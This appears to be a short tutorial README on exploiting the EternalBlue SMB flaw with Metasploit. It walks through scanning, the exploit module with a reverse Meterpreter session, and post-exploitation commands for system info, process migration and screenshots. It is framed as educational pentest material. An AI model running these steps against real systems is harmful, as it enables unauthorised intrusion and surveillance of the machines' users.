This documentation provides a step-by-step guide on how to use Metasploit to exploit the EternalBlue vulnerability in a target system for educational and ethical purposes only.
Before proceeding, ensure that you have the following prerequisites:
- A Kali Linux machine with Metasploit Framework installed.
- Permission to test on a network and system you own or have explicit permission to access.
msf6 > search eternal
msf6 > use auxiliary/scanner/smb/smb_ms17_010
msf6 auxiliary(scanner/smb/smb_ms17_010) > set RHOSTS 192.168.1.100
msf6 auxiliary(scanner/smb/smb_ms17_010) > use exploit/windows/smb/ms17_010_eternalblue
msf6 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 192.168.1.100
msf6 exploit(windows/smb/ms17_010_eternalblue) > set LHOST 192.168.1.69
msf6 exploit(windows/smb/ms17_010_eternalblue) > exploit
After successfully exploiting a target system using Metasploit's Meterpreter, it's essential to gather system information to better understand the compromised host. The sysinfo
command is a useful tool for retrieving key information about the target system.
To retrieve system information, follow these steps:
-
Access a Meterpreter session on the compromised host. You should already have an active Meterpreter session. If not, establish one by using the appropriate Metasploit exploit.
-
Once you have an active Meterpreter session, you can execute the
sysinfo
command:
meterpreter > sysinfo
meterpreter > ps
meterpreter > migrate 4536
meterpreter > screenshot
This documentation and the provided commands are intended for educational and ethical purposes only. Unauthorized use of these techniques may be illegal. Ensure you have the appropriate permissions and follow ethical standards when using these tools.
This project is licensed under the MIT License. MIT